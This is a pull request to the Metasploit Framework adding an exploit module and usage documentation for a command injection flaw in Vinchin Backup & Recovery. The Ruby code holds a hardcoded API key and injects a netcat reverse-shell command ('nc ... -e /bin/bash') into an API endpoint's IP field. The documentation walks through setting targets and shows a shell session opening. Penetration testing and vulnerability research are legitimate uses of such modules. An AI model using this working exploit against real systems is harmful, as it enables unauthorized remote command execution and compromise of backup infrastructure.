### PR TITLE
Add Exploit Module for Vinchin Backup & Recovery Command Injection Vulnerability

### DIFF
--- a/documentation/modules/exploit/linux/http/vinchin_backup_recovery_cmd_inject.md
+++ b/documentation/modules/exploit/linux/http/vinchin_backup_recovery_cmd_inject.md
@@ -1,0 +1,101 @@
+# Vinchin Backup & Recovery Command Injection Exploit Documentation
+
+## Overview
+
+**Module Name**: `exploit/linux/http/vinchin_backup_recovery_cmd_inject`
+
+**Module Type**: Exploit
+
+**Platform**: Linux
+
+**Privilege Escalation**: No
+
+**Remote Exploit**: Yes
+
+**Disclosure Date**: 2023-10-26
+
+## Description
+
+A command injection vulnerability exists within the Vinchin Backup & Recovery product. This exploit module takes advantage of this vulnerability by sending a crafted HTTP request containing the injected command. Successful exploitation will result in the execution of arbitrary commands on the target system under the context of the web server user.
+
+## Module Requirements
+
+- Metasploit Framework
+- Network access to the target system via port 443 (or other, if configured)
+
+## Target
+
+Vinchin Backup & Recovery systems with version detected as 7.0.1.26282.
+
+## Options
+
+- **RHOSTS**: The target address
+- **RPORT**: The target port (default: 443)
+- **SSL**: Specify the use of SSL (default: true)
+- **TARGETURI**: The base path to the Vinchin Backup & Recovery application (default: `/api/`)
+- **APIKEY**: The hardcoded API key required to authenticate to the API
+- **Proxies**: A proxy chain
+- **VHOST**: HTTP server virtual host
+
+## Payload Options
+
+- **LHOST**: The local host to listen on (interface/IP)
+- **LPORT**: The local port to listen on (default: 4444)
+
+## Usage Instructions
+
+1. Use Metasploit to access the module:
+   ```
+   use exploit/linux/http/vinchin_backup_recovery_cmd_inject
+   ```
+
+2. Set the necessary options:
+   ```
+   set RHOSTS <target_ip>
+   set LHOST <local_ip>
+   set APIKEY <api_key>
+   ```
+
+3. (Optional) Set the payload:
+   ```
+   set payload <payload_name>
+   ```
+
+4. Verify the target’s vulnerability:
+   ```
+   check
+   ```
+
+5. Execute the exploit:
+   ```
+   exploit
+   ```
+
+## Scenarios
+
+### Successful Exploitation against Vinchin Backup & Recovery 7.0.1.26282
+
+1. Start `msfconsole` and load the exploit.
+2. Set the `RHOSTS`, `RPORT`, `LHOST`, and any other required options.
+3. Verify the target’s vulnerability with the `check` command.
+4. Run the `exploit` command.
+5. Upon successful exploitation, a shell or other specified payload will be executed on the target.
+
+**Console Output Example**:
+
+```
+msf6 > use exploit/linux/http/vinchin_backup_recovery_cmd_inject
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > set RHOSTS 192.168.56.1
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > set LHOST 192.168.56.15
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > check
+
+[*] HTTP Response Code: 200
+[*] Detected Vinchin version: 7.0.1.26282
+[+] 192.168.56.1:443 - The target is vulnerable.
+
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > exploit
+
+[*] Started reverse TCP handler on 192.168.56.15:4444 
+...
+[*] Command shell session 1 opened (192.168.56.15:4444 -> 192.168.56.1:443) at 2023-10-26 12:34:56 -0400
+```

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -73,7 +73,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'data'      => "p={\"ip\":\"127.0.0.1 ;#{injection_command}\"}"
     })
   end
-    
 
   def check
     target_uri_path = normalize_uri(target_uri.path.split('/')[0], '/login.php')
@@ -104,6 +103,5 @@ class MetasploitModule < Msf::Exploit::Remote
       print_error('Unable to extract version with the regex provided.')
       return CheckCode::Unknown('Unable to extract version.')
     end
-  end  
-  
+  end   
 end

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -1,0 +1,109 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+        'Name' => 'Vinchin Backup & Recovery Command Injection',
+        'Description' => %q{
+        This module exploits a command injection vulnerability in Vinchin Backup & Recovery
+        versions 5.0 to 7.0. Due to insufficient input validation in the
+        checkIpExists API endpoint, an attacker can execute arbitrary commands as the
+        web server user.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+        [
+            'Gregory Boddin (LeakIX)',  # Vulnerability discovery
+            'Valentin Lobstein',        # Metasploit module
+        ],
+        'References' =>
+        [
+            [ 'CVE', '2023-45498' ],
+            [ 'CVE', '2023-45499' ],
+            [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-45498' ],
+            [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-45499' ],
+            [ 'URL', 'https://blog.leakix.net/2023/10/vinchin-backup-rce-chain/' ],
+            [ 'URL', 'https://vinchin.com/' ] # Vendor URL
+        ],
+        'DisclosureDate' => '2023-10-26',
+        'Platform' => ['linux'],
+        'Targets'        =>
+        [
+            ['Vinchin Backup & Recovery', {}]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+        'PAYLOAD' => 'generic/shell_reverse_tcp',
+        'SSL' => true
+        },
+        'Privileged' => false
+    ))
+
+    register_options(
+        [
+        Opt::RPORT(443),
+        OptString.new('TARGETURI', [ true, 'The base path to the Vinchin Backup & Recovery application', '/api/']),
+        OptString.new('APIKEY', [true, 'The hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71'])
+        ])
+    end
+    
+  def exploit
+    print_status('Generating reverse shell command...')
+    lhost = datastore['LHOST']
+    lport = datastore['LPORT']
+    injection_command = "nc #{lhost} #{lport} -e /bin/bash"
+
+    print_status('Sending reverse shell payload...')
+    send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(datastore['TARGETURI']),
+      'vars_get'  => {
+        'm' => '30',
+        'f' => 'checkIpExists',
+        'k' => datastore['APIKEY']
+      },
+      'data'      => "p={\"ip\":\"127.0.0.1 ;#{injection_command}\"}"
+    })
+  end
+    
+
+  def check
+    target_uri_path = normalize_uri(target_uri.path.split('/')[0], '/login.php')
+    res = send_request_cgi('uri' => target_uri_path)
+  
+    unless res
+      print_error('Failed to connect to the target.')
+      return CheckCode::Unknown('Failed to connect to the target.')
+    end
+  
+    print_status("HTTP Response Code: #{res.code}")  
+    version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/
+    version_match = res.body.match(version_pattern)
+  
+    if version_match && version_match[1]
+      version = version_match[1]
+      print_status("Detected Vinchin version: #{version}")
+      version = Gem::Version.new(version)
+  
+      vulnerable_versions = Gem::Requirement.new('>= 5.0', '< 7.1')
+  
+      if vulnerable_versions.satisfied_by?(version)
+        return CheckCode::Vulnerable("Detected vulnerable version: #{version}")
+      else
+        return CheckCode::Safe("Detected non-vulnerable version: #{version}")
+      end
+    else
+      print_error('Unable to extract version with the regex provided.')
+      return CheckCode::Unknown('Unable to extract version.')
+    end
+  end  
+  
+end


### PR DESCRIPTION
Hello Metasploit Team,

I am submitting a new exploit module for inclusion in the Metasploit Framework. This module targets a command injection vulnerability in Vinchin Backup & Recovery version 7.0.1.26282.

**Module Name**: exploit/linux/http/vinchin_backup_recovery_cmd_inject

### Module Description
The module exploits a command injection vulnerability in the specified version of Vinchin Backup & Recovery software. It sends a specially crafted HTTP request to the server, leading to arbitrary command execution under the context of the web server user.

### Verification Steps:
1. Start `msfconsole`
2. `use exploit/linux/http/vinchin_backup_recovery_cmd_inject`
3. Set `RHOSTS`, `RPORT`, `SSL`, `TARGETURI`, `APIKEY`, `LHOST`, `LPORT`
4. Run `check` to verify the target is vulnerable
5. Run `exploit` to execute the payload on the target system

### Scenarios
A detailed example scenario has been provided to demonstrate the successful exploitation of a Vinchin Backup & Recovery system in the documentation, and references in the exploit.

I have adhered to the module development guidelines, tested the module thoroughly, and included documentation. I believe the module could be a valuable addition to Metasploit's suite of tools.

Thank you for considering this addition. I am open to further discussions and will gladly make adjustments as required.

Best regards,

Chocapikk